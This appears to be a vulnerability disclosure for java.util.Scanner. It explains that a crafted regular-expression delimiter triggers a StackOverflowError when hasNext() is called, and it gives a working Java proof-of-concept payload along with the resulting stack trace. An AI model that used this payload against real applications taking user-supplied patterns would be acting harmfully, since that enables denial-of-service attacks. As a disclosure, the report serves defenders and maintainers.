j.u.Scanner allows to set a regular expression string as text delimiter. A
missing recursion upper limit in regex processing causes a stack overflow to
occur when querying for the availability of a potential next token to be
delivered by the scanner.

Developers could use this API to allow users to query larger texts for
patterns, for example in a web application. However edge cases exist that
cause a StackOverflowError to be triggered, instead of detecting the recursion scenario earlier.

The following PoC illustrates the issue:

import java.util.*;
public class ScannerSOE {
    public static void main(String[] a) {
        String payload = new String(new
byte[]{91,92,97,92,87,45,45,45,45,45,45,45,45,45,45,120,121,122,123,49,44,51,38,38,38,99,-118,-118,69,93,-126,-36});
        Scanner s = new Scanner("1 fish 2 fish red fish blue fish");
        s.useDelimiter(payload.substring(0,26)+(new String(new
byte[]{-118})).repeat(16384)+payload.substring(27));
        s.hasNext();
    }
}

to reproduce:

$ java ScannerSOE 2>&1 | head -4
Exception in thread "main" java.lang.StackOverflowError
at java.base/java.util.regex.Pattern$CharPredicate.lambda$union$1(Pattern.java:5618)
at java.base/java.util.regex.Pattern$CharPredicate.lambda$union$1(Pattern.java:5618)
at java.base/java.util.regex.Pattern$CharPredicate.lambda$union$1(Pattern.java:5618)